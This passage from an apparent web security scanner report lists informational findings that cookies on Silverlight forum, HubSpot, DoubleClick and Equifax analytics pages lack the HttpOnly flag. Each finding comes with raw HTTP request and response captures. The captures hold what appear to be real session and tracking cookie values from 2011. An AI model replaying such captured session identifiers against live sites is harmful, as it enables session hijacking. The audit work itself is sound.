GET /b/ss/equifaxprod,equifaxglobal/1/H.17/s0893607710022?AQB=1&ndh=1&t=24/3/2011%2014%3A44%3A52%200%20300&ns=equifaxps&pageName=/us/psol/web/lander/ECLanderM-Q1NEWFREETRIAL&g=http%3A//equifax.com/free30daytrial/%3FCMP%3DKNC-Google%26HBX_PK%3Dcredit_monitoring_service%26HBX_OU%3D50%26gclid%3DCNf214_1tagCFeM85Qod4FaqEA&cc=USD&vvp=DFA%231516833%3Av18%3D%5B%5B%22DFA-%22%2Blis%2B%22-%22%2Blip%2B%22-%22%2Blastimp%2B%22-%22%2Blastimptime%2B%22-%22%2Blcs%2B%22-%22%2Blcp%2B%22-%22%2Blastclk%2B%22-%22%2Blastclktime%5D%5D&ch=Personal%20Solutions&server=Samba&events=event8&c7=12%3A30PM&v7=12%3A30PM&c8=Sunday&v8=Sunday&c10=New&v10=New&c14=/us/psol/web/lander/ECLanderM-Q1NEWFREETRIAL&v14=/us/psol/web/lander/ECLanderM-Q1NEWFREETRIAL&v16=/us/psol/web/lander/ECLanderM-Q1NEWFREETRIAL&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1034&bh=907&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: equifaxps.122.2o7.net
Proxy-Connection: keep-alive
Referer: http://equifax.com/free30daytrial/?CMP=KNC-Google&HBX_PK=credit_monitoring_service&HBX_OU=50&gclid=CNf214_1tagCFeM85Qod4FaqEA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 19:55:17 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26DA4012851D3299-60000102202518E1[CE]; Expires=Fri, 22 Apr 2016 19:55:17 GMT; Domain=equifaxps.122.2o7.net; Path=/
Location: http://equifaxps.122.2o7.net/b/ss/equifaxprod,equifaxglobal/1/H.17/s0893607710022?AQB=1&pccr=true&vidn=26DA4012851D3299-60000102202518E1&&ndh=1&t=24/3/2011%2014%3A44%3A52%200%20300&ns=equifaxps&pageName=/us/psol/web/lander/ECLanderM-Q1NEWFREETRIAL&g=http%3A//equifax.com/free30daytrial/%3FCMP%3DKNC-Google%26HBX_PK%3Dcredit_monitoring_service%26HBX_OU%3D50%26gclid%3DCNf214_1tagCFeM85Qod4FaqEA&cc=USD&vvp=DFA%231516833%3Av18%3D%5B%5B%22DFA-%22%2Blis%2B%22-%22%2Blip%2B%22-%22%2Blastimp%2B%22-%22%2Blastimptime%2B%22-%22%2Blcs%2B%22-%22%2Blcp%2B%22-%22%2Blastclk%2B%22-%22%2Blastclktime%5D%5D&ch=Personal%20Solutions&server=Samba&events=event8&c7=12%3A30PM&v7=12%3A30PM&c8=Sunday&v8=Sunday&c10=New&v10=New&c14=/us/psol/web/lander/ECLanderM-Q1NEWFREETRIAL&v14=/us/psol/web/lander/ECLanderM-Q1NEWFREETRIAL&v16=/us/psol/web/lander/ECLanderM-Q1NEWFREETRIAL&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1034&bh=907&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Sat, 23 Apr 2011 19:55:17 GMT
Last-Modified: Mon, 25 Apr 2011 19:55:17 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www17
Content-Length: 0
Content-Type: text/plain


18.272. http://fightidentitytheft.hubspot.com/salog.js.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fightidentitytheft.hubspot.com
Path:   /salog.js.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /salog.js.aspx HTTP/1.1
Host: fightidentitytheft.hubspot.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Sun, 24 Apr 2011 19:44:15 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=p2zKdokhzQEkAAAAMDEyMjYyNmUtYzRkNy00Mjg2LWIwYzMtMjZjNDI2ZGUzNjM20; expires=Mon, 23-Apr-2012 19:44:15 GMT; path=/; HttpOnly
Set-Cookie: hubspotutk=230b3f9e-98d3-4fd8-8226-019169d79ef6; domain=fightidentitytheft.hubspot.com; expires=Sat, 24-Apr-2021 05:00:00 GMT; path=/; HttpOnly
Vary: Accept-Encoding
Set-Cookie: HUBSPOT133=454104236.0.0000; path=/
Content-Length: 496


var hsUse20Servers = true;
var hsDayEndsIn = 29744;
var hsWeekEndsIn = 29744;
var hsMonthEndsIn = 548144;
var hsAnalyticsServer = "tracking.hubspot.com";
var hsTimeStamp = "2011-04-24 15:44:1
...[SNIP]...

18.273. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /activityi;src=2716759;type=eclan538;cat=eclan575;ord='%20+%20a%20+%20'? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: fls.doubleclick.net

Response

HTTP/1.1 302 Found
Set-Cookie: test_cookie=CheckForPermission; expires=Sun, 24-Apr-2011 20:09:46 GMT; path=/; domain=.doubleclick.net
Location: /activityi;src=2716759;type=eclan538;cat=eclan575;ord='%20+%20a%20+%20'?&_dc_ck=try
Date: Sun, 24 Apr 2011 19:54:46 GMT
Content-Type: text/html; charset=UTF-8
Server: Floodlight server
Content-Length: 292
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="/activityi;src=2716759;type=ecla
...[SNIP]...

18.274. http://forums.silverlight.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Fri, 22 Apr 2011 08:37:02 GMT; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:56:51 GMT; expires=Mon, 23-Apr-2012 15:56:51 GMT; path=/
Set-Cookie: CommunityServer-LastVisitUpdated-2101=; path=/
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:56:51 GMT; expires=Mon, 23-Apr-2012 15:56:51 GMT; path=/
Set-Cookie: ASP.NET_SessionId=s4g33u45fgveyw55h3c01k45; path=/; HttpOnly
Set-Cookie: CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521; expires=Sun, 24-Apr-2011 16:16:51 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:56:52 GMT
Content-Length: 62485


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head id="ctl00_ctl00"
...[SNIP]...

18.275. http://forums.silverlight.net/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /default.aspx HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-2101=; CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:56:51 GMT; ASP.NET_SessionId=s4g33u45fgveyw55h3c01k45; CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dforums.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/default.aspx%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:56:55 GMT; expires=Mon, 23-Apr-2012 15:56:55 GMT; path=/
Set-Cookie: CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521; expires=Sun, 24-Apr-2011 16:16:55 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:56:55 GMT
Content-Length: 62485


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head id="ctl00_ctl00"
...[SNIP]...

18.276. http://forums.silverlight.net/forums/13.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/13.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/13.aspx HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=s4g33u45fgveyw55h3c01k45; CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:56:54 GMT; CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:56:59 GMT; expires=Mon, 23-Apr-2012 15:56:59 GMT; path=/
Set-Cookie: CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521; expires=Sun, 24-Apr-2011 16:16:59 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:56:59 GMT
Content-Length: 73658


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Instal
...[SNIP]...

18.277. http://forums.silverlight.net/forums/17.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/17.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/17.aspx HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=s4g33u45fgveyw55h3c01k45; CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:56:58 GMT; CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:57:01 GMT; expires=Mon, 23-Apr-2012 15:57:01 GMT; path=/
Set-Cookie: CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521; expires=Sun, 24-Apr-2011 16:17:02 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:57:01 GMT
Content-Length: 77618


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Progra
...[SNIP]...

18.278. http://forums.silverlight.net/forums/AddPost.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/AddPost.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/AddPost.aspx?ForumID=13 HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/forums/13.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=s4g33u45fgveyw55h3c01k45; CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:58:30 GMT; s_sq=msstoslvnet%3D%2526pid%253Dforums.silverlight.net/forums/13.aspx%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/forums/AddPost.aspx%25253FForumID%25253D13%2526ot%253DA

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 192
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: /login.aspx?ReturnUrl=%2fforums%2fAddPost.aspx%3fForumID%3d13
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 12:01:48 GMT; expires=Mon, 23-Apr-2012 16:01:48 GMT; path=/
Set-Cookie: CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521; expires=Sun, 24-Apr-2011 16:21:48 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 16:01:48 GMT

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2flogin.aspx%3fReturnUrl%3d%252fforums%252fAddPost.aspx%253fForumID%253d13">here</a>.</h2>
</body></html>

18.279. http://forums.silverlight.net/forums/TopicsNotAnswered.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/TopicsNotAnswered.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/TopicsNotAnswered.aspx?ForumID=-1 HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=s4g33u45fgveyw55h3c01k45; CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:57:00 GMT; CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:57:05 GMT; expires=Mon, 23-Apr-2012 15:57:05 GMT; path=/
Set-Cookie: CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521; expires=Sun, 24-Apr-2011 16:17:05 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:57:05 GMT
Content-Length: 73491


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Thread
...[SNIP]...

18.280. http://forums.silverlight.net/forums/p/226774/548773.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/p/226774/548773.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/p/226774/548773.aspx HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=s4g33u45fgveyw55h3c01k45; CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D; CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:58:27 GMT

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 12:01:29 GMT; expires=Mon, 23-Apr-2012 16:01:29 GMT; path=/
Set-Cookie: CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521; expires=Sun, 24-Apr-2011 16:21:29 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 16:01:30 GMT
Content-Length: 25404


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Silver
...[SNIP]...

18.281. http://forums.silverlight.net/forums/t/226774.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/t/226774.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/t/226774.aspx HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=s4g33u45fgveyw55h3c01k45; CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:57:03 GMT; CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 12:01:17 GMT; expires=Mon, 23-Apr-2012 16:01:17 GMT; path=/
Set-Cookie: CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521; expires=Sun, 24-Apr-2011 16:21:17 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 16:01:18 GMT
Content-Length: 25379


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Silver
...[SNIP]...

18.282. http://forums.silverlight.net/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /login.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login.aspx?ReturnUrl=%2fforums%2fAddPost.aspx%3fForumID%3d13 HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/forums/13.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=s4g33u45fgveyw55h3c01k45; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dforums.silverlight.net/forums/13.aspx%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/forums/AddPost.aspx%25253FForumID%25253D13%2526ot%253DA; CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:58:31 GMT; CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http://forums.silverlight.net/forums/AddPost.aspx?ForumID=13
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 12:02:02 GMT; expires=Mon, 23-Apr-2012 16:02:02 GMT; path=/
X-Powered-By: ASP.NET
